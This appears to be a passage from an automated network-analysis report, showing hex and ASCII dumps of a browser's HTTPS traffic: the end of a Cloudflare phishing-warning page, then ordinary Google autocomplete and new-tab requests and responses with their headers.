                                                                                                                                                                                                                                                              2024-12-22 01:18:54 UTC1369INData Raw: 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d
                                                                                                                                                                                                                                                              Data Ascii: n-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElem
                                                                                                                                                                                                                                                              2024-12-22 01:18:54 UTC1369INData Raw: 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72
                                                                                                                                                                                                                                                              Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <for
                                                                                                                                                                                                                                                              2024-12-22 01:18:54 UTC1013INData Raw: 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e
                                                                                                                                                                                                                                                              Data Ascii: " class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span
                                                                                                                                                                                                                                                              2024-12-22 01:18:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              48192.168.2.450234172.217.19.228443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:54 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:55 GMT
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              Expires: -1
                                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                              Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                              Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-0g1bVPkOXDBL-RG6dk3ZNQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC124INData Raw: 36 64 35 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 73 74 72 65 61 6d 69 6e 67 20 6d 6f 76 69 65 73 22 2c 22 64 72 6f 6e 65 73 22 2c 22 63 6f 6c 6c 65 67 65 20 66 6f 6f 74 62 61 6c 6c 20 70 6c 61 79 6f 66 66 20 62 72 61 63 6b 65 74 22 2c 22 6d 61 72 76 65 6c 20 72 69 76 61 6c 73 20 77 69 6e 20 72 61 74 65 73 22 2c 22 6a 61 6d 65 73 20 67 75 6e 6e 20 73 75 70 65 72 6d 61 6e
                                                                                                                                                                                                                                                              Data Ascii: 6d5)]}'["",["streaming movies","drones","college football playoff bracket","marvel rivals win rates","james gunn superman
                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC1390INData Raw: 20 6d 6f 76 69 65 20 74 72 61 69 6c 65 72 22 2c 22 6e 65 77 20 73 70 65 63 69 65 73 20 64 69 73 63 6f 76 65 72 65 64 20 70 65 72 75 22 2c 22 63 6f 73 74 63 6f 20 66 6f 6f 64 20 63 6f 75 72 74 20 63 6f 6b 65 20 70 72 6f 64 75 63 74 73 22 2c 22 6c 61 73 20 76 65 67 61 73 20 72 61 69 64 65 72 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73
                                                                                                                                                                                                                                                              Data Ascii: movie trailer","new species discovered peru","costco food court coke products","las vegas raiders"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:sugges
                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC242INData Raw: 56 48 46 61 56 56 6c 4c 65 54 59 79 4e 58 56 4a 4e 6b 74 43 56 44 68 32 53 56 41 34 4f 54 63 35 52 6c 5a 32 53 30 52 5a 52 46 59 79 55 32 45 76 51 6d 35 4f 63 57 46 54 63 31 4a 77 64 46 42 53 62 6b 4a 59 63 33 64 49 51 6d 70 6a 63 6e 5a 6e 4e 6b 45 31 4e 6d 31 6e 5a 6d 56 73 4e 44 4e 4f 59 54 6c 4d 63 45 31 7a 4c 30 46 61 5a 32 35 76 53 32 6c 30 61 57 35 78 4f 57 30 79 55 55 56 75 51 56 68 32 53 56 59 78 55 46 6c 6b 52 48 68 76 61 32 56 49 4d 44 6c 35 63 54 49 76 51 33 46 4e 61 45 52 54 57 44 56 56 54 6e 52 34 4d 7a 4a 54 51 57 78 4b 56 6e 56 59 4d 6b 67 77 4d 45 68 45 65 46 4e 68 54 48 52 75 56 6d 68 4a 53 46 4e 75 55 48 45 72 65 46 46 6d 4f 45 46 48 62 44 45 34 55 44 55 78 5a 46 4a 57 4d 46 55 79 61 56 5a 57 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: VHFaVVlLeTYyNXVJNktCVDh2SVA4OTc5RlZ2S0RZRFYyU2EvQm5OcWFTc1JwdFBSbkJYc3dIQmpjcnZnNkE1Nm1nZmVsNDNOYTlMcE1zL0FaZ25vS2l0aW5xOW0yUUVuQVh2SVYxUFlkRHhva2VIMDl5cTIvQ3FNaERTWDVVTnR4MzJTQWxKVnVYMkgwMEhEeFNhTHRuVmhJSFNuUHEreFFmOEFHbDE4UDUxZFJWMFUyaVZW
                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC93INData Raw: 35 37 0d 0a 65 57 31 76 62 45 78 44 4d 7a 4e 72 63 45 4a 54 4d 6d 78 42 53 6a 4e 78 65 6a 4a 42 53 6a 64 6e 59 7a 5a 68 53 7a 5a 4a 55 48 68 48 61 31 4e 4a 56 31 41 34 51 57 52 4e 54 33 68 35 5a 6c 4a 69 59 57 67 76 5a 54 4e 54 62 6c 64 77 56 6a 52 30 53 57 35 54 55 6c 56 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 57eW1vbExDMzNrcEJTMmxBSjNxejJBSjdnYzZhSzZJUHhHa1NJV1A4QWRNT3h5ZlJiYWgvZTNTbldwVjR0SW5TUlV
                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC1390INData Raw: 38 62 39 0d 0a 76 63 54 56 46 52 32 4a 48 57 45 56 72 62 32 46 56 52 58 56 4b 55 57 39 6e 4e 32 74 46 4f 47 4a 6e 56 57 63 34 4f 45 68 48 54 6b 4a 69 4d 57 31 78 57 47 35 61 62 46 46 6a 62 31 56 70 62 33 6c 4a 5a 32 70 73 64 33 42 68 59 58 64 48 62 6b 56 31 52 57 74 78 51 58 68 6f 55 56 42 50 54 57 70 71 61 32 4e 6a 61 6c 5a 31 4d 55 56 32 52 32 74 56 55 6d 31 31 64 56 5a 79 4d 31 4a 6b 55 47 67 72 65 57 70 4f 51 6b 6c 56 64 45 52 53 53 53 39 45 4d 48 64 50 4d 32 31 6b 56 7a 46 4c 63 6b 35 47 64 57 6c 74 64 44 49 33 52 6d 4e 75 62 44 5a 45 53 46 4d 7a 52 6d 78 35 62 7a 64 6d 64 46 68 4a 4e 56 64 51 59 55 31 78 4d 6d 74 6f 53 31 46 72 51 55 46 6e 4e 55 39 6a 5a 45 31 77 56 6d 49 7a 4d 46 52 4d 64 47 56 76 55 6c 6c 68 61 30 39 54 56 6d 68 44 55 54 4a 73 57
                                                                                                                                                                                                                                                              Data Ascii: 8b9vcTVFR2JHWEVrb2FVRXVKUW9nN2tFOGJnVWc4OEhHTkJiMW1xWG5abFFjb1Vpb3lJZ2psd3BhYXdHbkV1RWtxQXhoUVBPTWpqa2NjalZ1MUV2R2tVUm11dVZyM1JkUGgreWpOQklVdERSSS9EMHdPM21kVzFLck5GdWltdDI3RmNubDZESFMzRmx5bzdmdFhJNVdQYU1xMmtoS1FrQUFnNU9jZE1wVmIzMFRMdGVvUllha09TVmhDUTJsW
                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC850INData Raw: 51 32 67 35 65 57 78 6e 4e 7a 4d 30 51 30 5a 47 55 6d 6c 6c 63 56 49 72 63 48 5a 35 53 55 68 49 55 54 52 33 5a 45 52 74 52 6c 5a 54 65 58 6c 36 52 6d 31 53 4d 6a 56 56 55 6e 41 30 54 32 68 30 57 55 46 56 55 45 35 4a 57 47 70 4a 55 32 56 4e 61 69 74 30 54 32 45 34 64 32 67 33 51 6c 5a 72 53 31 51 34 63 54 42 75 51 6c 51 35 52 48 4a 43 4d 31 41 30 56 6c 63 76 57 46 68 47 64 6e 56 52 64 33 68 4a 56 57 4e 78 61 31 46 73 51 6d 78 68 61 6a 5a 76 64 31 56 4c 53 6a 64 75 51 55 6f 77 51 79 38 78 63 54 64 77 56 6c 4a 70 5a 54 56 53 62 7a 64 4e 52 30 68 71 51 6d 46 5a 4e 48 6c 4e 4e 58 67 31 51 57 52 50 51 55 4a 75 53 45 39 6b 59 6d 4a 33 64 6a 68 4e 63 46 5a 52 5a 47 6f 78 55 7a 56 4a 4e 32 6c 5a 55 55 38 72 54 46 51 7a 59 33 42 57 53 55 6b 76 56 57 39 49 4e 56 63
                                                                                                                                                                                                                                                              Data Ascii: Q2g5eWxnNzM0Q0ZGUmllcVIrcHZ5SUhIUTR3ZERtRlZTeXl6Rm1SMjVVUnA0T2h0WUFVUE5JWGpJU2VNait0T2E4d2g3QlZrS1Q4cTBuQlQ5RHJCM1A0VlcvWFhGdnVRd3hJVWNxa1FsQmxhajZvd1VLSjduQUowQy8xcTdwVlJpZTVSbzdNR0hqQmFZNHlNNXg1QWRPQUJuSE9kYmJ3djhNcFZRZGoxUzVJN2lZUU8rTFQzY3BWSUkvVW9INVc
                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              49192.168.2.450236172.217.19.228443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:54 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              50192.168.2.450237172.217.19.228443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:54 UTC510OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Version: 705503573
                                                                                                                                                                                                                                                              Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:55 GMT
                                                                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC372INData Raw: 31 36 39 62 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                              Data Ascii: 169b)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                              Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                              Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                              Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC1253INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                              Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
